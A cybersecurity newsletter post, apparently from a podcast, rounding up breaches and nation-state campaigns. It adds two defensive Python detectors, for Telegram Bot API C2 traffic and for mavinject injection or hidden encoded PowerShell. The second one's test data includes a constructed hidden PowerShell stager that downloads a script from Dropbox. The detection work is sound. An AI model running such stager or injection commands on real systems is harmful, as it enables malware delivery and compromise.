CISO Talk by James Azar
CyberHub Podcast
Lee Enterprises Ransomware Disruption, Insight Partners Cyberattack, HNFS Settles DoD Suit, Chinese cyber-attacks, Russian Phishing Campaign

From Data Breaches to Nation-State Tactics: A Worldwide Cybersecurity Roundup including Chinese Cyberattacks, Russian attacks and Data Breach Wednesday

Hey everyone—James Azar here, coming to you from Washington, D.C. The world of cybersecurity never sleeps, and neither do I—even when I’m on the road. In this edition, I’m tackling everything from disruptive ransomware attacks to sophisticated state-sponsored campaigns.

Buckle up, grab your coffee (or an energy drink you’re sneaking in), and let’s get into these critical stories you need to know.

Lee Enterprises Ransomware

With a national footprint spanning some 75 newspapers, Lee Enterprises was rocked by a ransomware attack that encrypted critical systems and also exfiltrated files, the standard double-extortion play: one payment demanded for decryption, another to keep the stolen data private. The outage caused significant delays in print distribution, billing, and online operations. The full scope is still unclear, but the incident underscores how exposed large media organizations are to disruptive cyberattacks, and how quickly an encryption event at the back office turns into a product that cannot ship.

Insight Partners Breach

New York-based venture capital and private equity giant Insight Partners, which oversees nearly USD 90 billion in assets, disclosed that its systems were breached in January after a social engineering attack. The firm says it contained the intrusion quickly and expects limited impact, but specifics, including whether ransomware was involved or what data was reached, remain undisclosed. With deal documents, portfolio-company financials, and confidential legal files in the mix, PE and VC firms remain prime targets for sophisticated threat actors.

Finastra Notifications

FinTech heavyweight Finastra has begun notifying affected individuals after an attacker used compromised credentials in November 2024 to reach its internally hosted secure file transfer platform and claimed to have taken as much as 400 GB of files. The exposure raises concerns over transaction records, account details, and personal information. Finastra maintains the breach was contained, but experts warn that misuse of such data can have long-lasting effects on financial institutions and end users alike. The practical control is MFA on the transfer endpoint plus alerting on unusual outbound volume, so a stolen credential alone cannot quietly move hundreds of gigabytes.

Health Net Federal Services Settlement

Health Net Federal Services (HNFS) and parent company Centene agreed to pay about USD 11.25 million to resolve False Claims Act allegations that HNFS falsely certified compliance with the Defense Health Agency's cybersecurity requirements under its TRICARE contract. The alleged shortcomings, unremediated vulnerabilities, outdated software, and inadequate vulnerability scanning, put the systems that handle benefits for U.S. military families at risk. The settlement is a reminder that a compliance certification on a federal contract is a representation to the government: a false one is actionable under the False Claims Act, not a paperwork lapse.


Mustang Panda (Chinese APT)

Sometimes referred to as Earth Preta, the Mustang Panda group continues refining stealthy tactics, this time abusing Microsoft's Application Virtualization Injector (MAVInject.exe), a signed, legitimate App-V utility, to inject its payload into an already-running legitimate process (waitfor.exe in the reported samples) rather than starting a process of its own. Spear-phishing emails carrying decoy PDFs remain the go-to entry point, aimed at governments, NGOs, and think tanks. Because the malicious code executes inside a trusted process that was launched by a trusted Microsoft binary, antivirus that judges activity by the process it lives in is bypassed, leaving both data theft and espionage risks. The detection signal is the command line: mavinject.exe with the /INJECTRUNNING switch, launched by anything other than the App-V client, deserves a look.

Winnti Targeting Japan

Another China-linked APT, Winnti, has been zeroing in on Japanese manufacturing and energy firms, exploiting vulnerabilities in ERP platforms and IBM Lotus Domino servers to get in and exfiltrate sensitive IP and proprietary data. Researchers note that Winnti collaborates with other Chinese threat actors, pointing to a larger, coordinated effort to sharpen China's technological and commercial edge. Internet-facing ERP and Domino instances are legacy attack surface that rarely gets patched on schedule; inventory them and put them behind authentication or a VPN.

Russian Actors Exploiting Signal

Russian-linked operatives are phishing Signal users into linking their accounts to attacker-controlled devices. Signal's legitimate linked-devices feature works by scanning a QR code, so the attackers embed a malicious device-linking QR code in what looks like a group invite, a security alert, or device-pairing instructions; a victim who scans it silently adds the attacker's device, which from then on receives every message in real time. Nothing about the end-to-end encryption is broken: the attacker simply becomes one of the endpoints. This highlights how even robust platforms can be undermined when social engineering bypasses user caution, and why a periodic check of Signal's Linked Devices list belongs in any high-risk user's routine.

Telegram Backdoor

A newly discovered Golang-based backdoor uses Telegram's Bot API as its command-and-control channel: the implant polls a bot for operator commands and posts results back through the same API. Although it still looks early in development, it already supports remote command execution and data exfiltration. Telegram's ubiquity is what makes it attractive to cybercriminals: the C2 traffic is ordinary TLS to api.telegram.org, the attacker needs no infrastructure of their own, and it blends in wherever Telegram is in normal use. The flip side is that on servers and in networks where Telegram has no business purpose, any Bot API call from an unexpected process is a clean detection.
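The security-relevant point is that last one: the Bot API leaves a clean fingerprint. Below is an added example (mine, not code from the page or from the researchers who analysed the backdoor) that scans constructed proxy log lines for Bot API calls, groups them by source, process and bot token, and flags a non-allowlisted process that either polls getUpdates on a steady timer or pushes data out through sendMessage or sendDocument. The log layout, hosts, process names, the ops-alerter.exe allowlist and both bot tokens are assumptions.

```python
"""Spot implant-style use of the Telegram Bot API in outbound proxy logs.

Added example for this post; not code from the page or from the researchers
who analysed the backdoor. The log lines, hosts and process names are
constructed, and the space-separated layout (timestamp, source IP, process,
HTTP method, URL) is an assumption, not any vendor's log format.
"""
import re
from collections import defaultdict
from datetime import datetime

# A bot token is "<numeric bot id>:<35-char secret>" and sits in the URL path of
# every Bot API call, so a proxy that logs full URLs sees it in the clear.
BOT_API = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{35})/(?P<method>\w+)"
)
# What an implant needs: getUpdates to poll for operator commands, these to reply.
RESULT_METHODS = {"sendMessage", "sendDocument"}
# Assumed allowlist: the one internal process that legitimately drives a bot.
ALLOWED_PROCESSES = {"ops-alerter.exe"}

TOKEN_A = "7000000001:AAFakeTokenForExampleOnly0123456789"  # constructed, not real
TOKEN_B = "7000000002:AAOpsBotTokenExampleOnly98765432100"  # constructed, not real
CONSTRUCTED_LOG = "\n".join([
    f"2025-02-19T10:00:00Z 10.0.0.5 svchost.exe GET https://api.telegram.org/bot{TOKEN_A}/getUpdates?offset=1",
    f"2025-02-19T10:00:30Z 10.0.0.5 svchost.exe GET https://api.telegram.org/bot{TOKEN_A}/getUpdates?offset=1",
    f"2025-02-19T10:01:00Z 10.0.0.5 svchost.exe GET https://api.telegram.org/bot{TOKEN_A}/getUpdates?offset=1",
    f"2025-02-19T10:01:02Z 10.0.0.5 svchost.exe POST https://api.telegram.org/bot{TOKEN_A}/sendMessage",
    f"2025-02-19T10:01:30Z 10.0.0.5 svchost.exe GET https://api.telegram.org/bot{TOKEN_A}/getUpdates?offset=2",
    f"2025-02-19T10:05:00Z 10.0.0.7 ops-alerter.exe POST https://api.telegram.org/bot{TOKEN_B}/sendMessage",
    "2025-02-19T10:06:00Z 10.0.0.9 chrome.exe GET https://web.telegram.org/a/",
])


def parse_line(line):
    """Split one constructed log line into (timestamp, src_ip, process, http_method, url)."""
    ts, src, proc, method, url = line.split(maxsplit=4)
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), src, proc, method, url


def find_telegram_c2(log_text, min_polls=3, jitter=0.25):
    """One finding per (source, process, bot) that beacons to getUpdates on a steady
    timer from a non-allowlisted process, or pushes data out via a result method."""
    sessions = defaultdict(lambda: {"polls": [], "methods": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, proc, _http_method, url = parse_line(line)
        m = BOT_API.search(url)
        if not m:
            continue  # web client, unrelated host, etc.
        sess = sessions[(src, proc.lower(), m["token"])]
        sess["methods"].add(m["method"])
        if m["method"] == "getUpdates":
            sess["polls"].append(ts)

    findings = []
    for (src, proc, token), sess in sessions.items():
        if proc in ALLOWED_PROCESSES:
            continue
        polls = sorted(sess["polls"])
        gaps = [(b - a).total_seconds() for a, b in zip(polls, polls[1:])]
        median_gap = sorted(gaps)[len(gaps) // 2] if gaps else None
        # Beacon test: enough polls and every gap within `jitter` of the median.
        regular = bool(
            len(polls) >= min_polls
            and median_gap
            and all(abs(g - median_gap) <= jitter * median_gap for g in gaps)
        )
        pushes = sorted(sess["methods"] & RESULT_METHODS)
        if not regular and not pushes:
            continue
        reasons = []
        if regular:
            reasons.append(f"{len(polls)} getUpdates polls every ~{median_gap:.0f}s")
        if pushes:
            reasons.append("data sent via " + ", ".join(pushes))
        findings.append({
            "src": src, "process": proc,
            "bot_id": token.split(":", 1)[0],  # enough to report abuse; the secret stays in the log
            "polls": len(polls), "median_gap_s": median_gap, "pushes": pushes,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in find_telegram_c2(CONSTRUCTED_LOG):
        print(f"{f['src']} {f['process']} bot {f['bot_id']}: " + "; ".join(f["reasons"]))
```

Run against the constructed log, only the svchost.exe session on 10.0.0.5 is reported (four polls 30 seconds apart plus a sendMessage); the allowlisted ops bot and the browser session are ignored. In practice the allowlist should be short, the jitter tolerance tuned to your proxy's timestamp resolution, and the bot id is what you hand to Telegram's abuse contact.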

North Korea’s Kimsuky Campaign

North Korea’s Kimsuky group, also known as Thallium, has adopted more covert “living off the land” tradecraft in a campaign researchers call DEEP#DRIVE: PowerShell scripts launched from lures in benign file formats, with Dropbox serving both as the download point for later stages and as the drop point for collected data, so nothing in the chain touches attacker-owned infrastructure. The campaign targets South Korean organizations, including the cryptocurrency sector, where theft helps finance the regime. Kimsuky’s agility underscores a persistent push to find novel revenue sources while continuing espionage.
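Both Mustang Panda’s MAVInject.exe abuse and Kimsuky’s hidden, encoded PowerShell with Dropbox staging show up in the same place: the process-creation log. The following is an added example, not code from the page or from the researchers it cites, that triages constructed Sysmon-style events for both patterns, decoding -EncodedCommand (base64 over UTF-16LE) so a Dropbox URL hidden inside it is still caught. The field names, the AppVClient.exe parent allowlist, the trusted DLL directories, the Dropbox hosts and the document-handler list are assumptions to tune for your environment.

```python
"""Triage process-creation events for two living-off-the-land tricks: Microsoft's
App-V injector (mavinject.exe) pushing a DLL into a running process, and
PowerShell launched hidden with an encoded command that talks to Dropbox.

Added example for this post, not code from the page or the researchers it
cites. Events are constructed with Sysmon-style field names; the App-V parent
allowlist, trusted DLL dirs, Dropbox hosts and document handlers are assumptions.
"""
import base64
import ntpath
import re

INJECT_RE = re.compile(r"/INJECTRUNNING\s+(?P<dll>\S+)", re.I)
PID_RE = re.compile(r'mavinject(?:32)?\.exe"?\s+(?P<pid>\d+)', re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these spellings
# cover common usage. The argument is base64 over UTF-16LE text.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I)
DROPBOX_RE = re.compile(r"(?:api|content)\.dropboxapi\.com|dropbox\.com", re.I)

APPV_PARENT = "appvclient.exe"  # assumed: the only legitimate launcher of mavinject.exe
TRUSTED_DLL_DIRS = (r"c:\program files", r"c:\windows", r"c:\programdata\microsoft\appv")
POWERSHELL = {"powershell.exe", "pwsh.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "hwp.exe", "outlook.exe"}  # lure-document hosts


def encode_command(text):
    """Encode text the way -EncodedCommand expects (base64 over UTF-16LE)."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m["b64"], validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Return one finding per event that matches either rule, with the reasons."""
    findings = []
    for ev in events:
        image = ntpath.basename(ev["Image"]).lower()
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        cmd = ev.get("CommandLine", "")
        reasons = []
        if image in ("mavinject.exe", "mavinject32.exe"):
            inj = INJECT_RE.search(cmd)
            if inj and parent != APPV_PARENT:  # App-V's own client is the expected parent
                pid = PID_RE.search(cmd)
                reasons.append(f"App-V injector launched by {parent or 'unknown'} to load "
                               f"{inj['dll']} into PID {pid['pid'] if pid else '?'}")
                if not ntpath.dirname(inj["dll"]).lower().startswith(TRUSTED_DLL_DIRS):
                    reasons.append("DLL comes from a user-writable directory")
            if reasons:
                findings.append({"rule": "appv_injection", "image": ev["Image"], "reasons": reasons})
        elif image in POWERSHELL:
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                reasons.append("encoded command: " + decoded.strip()[:60])
            if HIDDEN_RE.search(cmd):
                reasons.append("hidden window")
            if DROPBOX_RE.search(cmd) or (decoded and DROPBOX_RE.search(decoded)):
                reasons.append("Dropbox used as download/upload point")
            if parent in OFFICE_PARENTS:
                reasons.append(f"spawned by document handler {parent}")
            if len(reasons) >= 2:  # one indicator alone is noisy; admins encode commands too
                findings.append({"rule": "lolbin_powershell", "image": ev["Image"], "reasons": reasons})
    return findings


def build_events():
    """Constructed Sysmon-style events: two benign, two mirroring the reported tradecraft."""
    stager = ("Invoke-WebRequest -Uri https://content.dropboxapi.com/2/files/download "
              "-OutFile $env:TEMP\\s.ps1")  # constructed second-stage fetch
    return [
        {"Image": r"C:\Windows\System32\mavinject.exe",
         "CommandLine": r"mavinject.exe 4520 /INJECTRUNNING C:\ProgramData\Microsoft\AppV\Client\Integration\hook.dll",
         "ParentImage": r"C:\Program Files\Microsoft Application Virtualization\Client\AppVClient.exe"},
        {"Image": r"C:\Windows\System32\mavinject.exe",
         "CommandLine": r"mavinject.exe 6120 /INJECTRUNNING C:\Users\Public\Libraries\loader.dll",
         "ParentImage": r"C:\Users\victim\AppData\Local\Temp\setup.exe"},
        {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + encode_command(stager),
         "ParentImage": r"C:\Windows\explorer.exe"},
        {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
         "ParentImage": r"C:\Windows\System32\svchost.exe"},
    ]


if __name__ == "__main__":
    for f in triage(build_events()):
        print(f["rule"], f["image"], "|", "; ".join(f["reasons"]))
```

The two benign events (App-V’s own client driving mavinject.exe, and a scheduled backup script) produce nothing; the injector run from a Temp-dropped installer and the hidden encoded PowerShell each yield one finding. Requiring two indicators for the PowerShell rule is the deliberate trade-off: encoded commands alone are everywhere in legitimate automation, but encoded plus hidden plus a cloud storage API is the shape of a stager.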

Key Takeaways

  • Fortify File Transfers: Put MFA in front of every file transfer service, keep it off the open internet where possible, and alert on unusual outbound volume so a single stolen credential cannot quietly move hundreds of gigabytes.

  • Don’t Underestimate Phishing: Even state-sponsored actors rely heavily on human error. Train staff well and deploy advanced phishing defenses.

  • Stay Compliant: Government and defense contractors face False Claims Act liability, not just fines, for misrepresenting cybersecurity compliance.

  • Lock Down Communications: End-to-end encryption protects the channel, not the endpoints. A phished device link hands an attacker a live copy of Signal messages, and Telegram’s API can serve as an attacker’s C2; audit linked devices and treat unexpected Telegram API traffic as suspicious.

  • Continuous Vigilance: Nation-state groups evolve rapidly. Keep up through proactive intelligence, regular patching, and network monitoring.


That’s all for this edition of the CyberHub Podcast. Whether you’re bracing against ransomware or thwarting nation-state espionage, there’s always plenty to monitor in the cybersecurity realm. Thanks for reading, and remember—staying cyber safe is a collective effort. Until next time, I’m James Azar signing off from D.C.!

Thanks for reading CISO Talk by James Azar! This post is public so feel free to share it.


✅ Story Links:

https://www.securityweek.com/lee-enterprises-newspaper-disruptions-caused-by-ransomware/

https://www.bleepingcomputer.com/news/security/venture-capital-giant-insight-partners-hit-by-cyberattack/

https://www.securityweek.com/finastra-starts-notifying-people-impacted-by-recent-data-breach/

https://thecyberexpress.com/hnfs-settles-cybersecurity-case/

https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-microsoft-app-v-tool-to-evade-antivirus/

https://www.darkreading.com/cyberattacks-data-breaches/china-linked-threat-group-japanese-orgs-servers

https://www.bleepingcomputer.com/news/security/russian-phishing-campaigns-exploit-signals-device-linking-feature/

https://www.securityweek.com/golang-backdoor-abuses-telegram-for-cc-communication/

https://www.darkreading.com/cyberattacks-data-breaches/north-koreans-kimsuky-attacks-rivals-trusted-platforms

🔔 Subscribe now for the latest insights from industry leaders, in-depth analyses, and real-world strategies to secure your digital world. https://www.youtube.com/@TheCyberHubPodcast/?sub_confirmation=1

🚨 Important Links to Follow:

👉Website:

👉Listen here: https://linktr.ee/cyberhubpodcast

Stay Connected With Us.

👉Facebook: https://www.facebook.com/CyberHubpodcast/

👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/

👉Twitter (X): https://twitter.com/cyberhubpodcast

👉Instagram: https://www.instagram.com/cyberhubpodcast

🤝 For Business Inquiries: info@cyberhubpodcast.com

=============================

🚀 About The CyberHub Podcast.

The Hub of the Infosec Community.

Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.

Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.
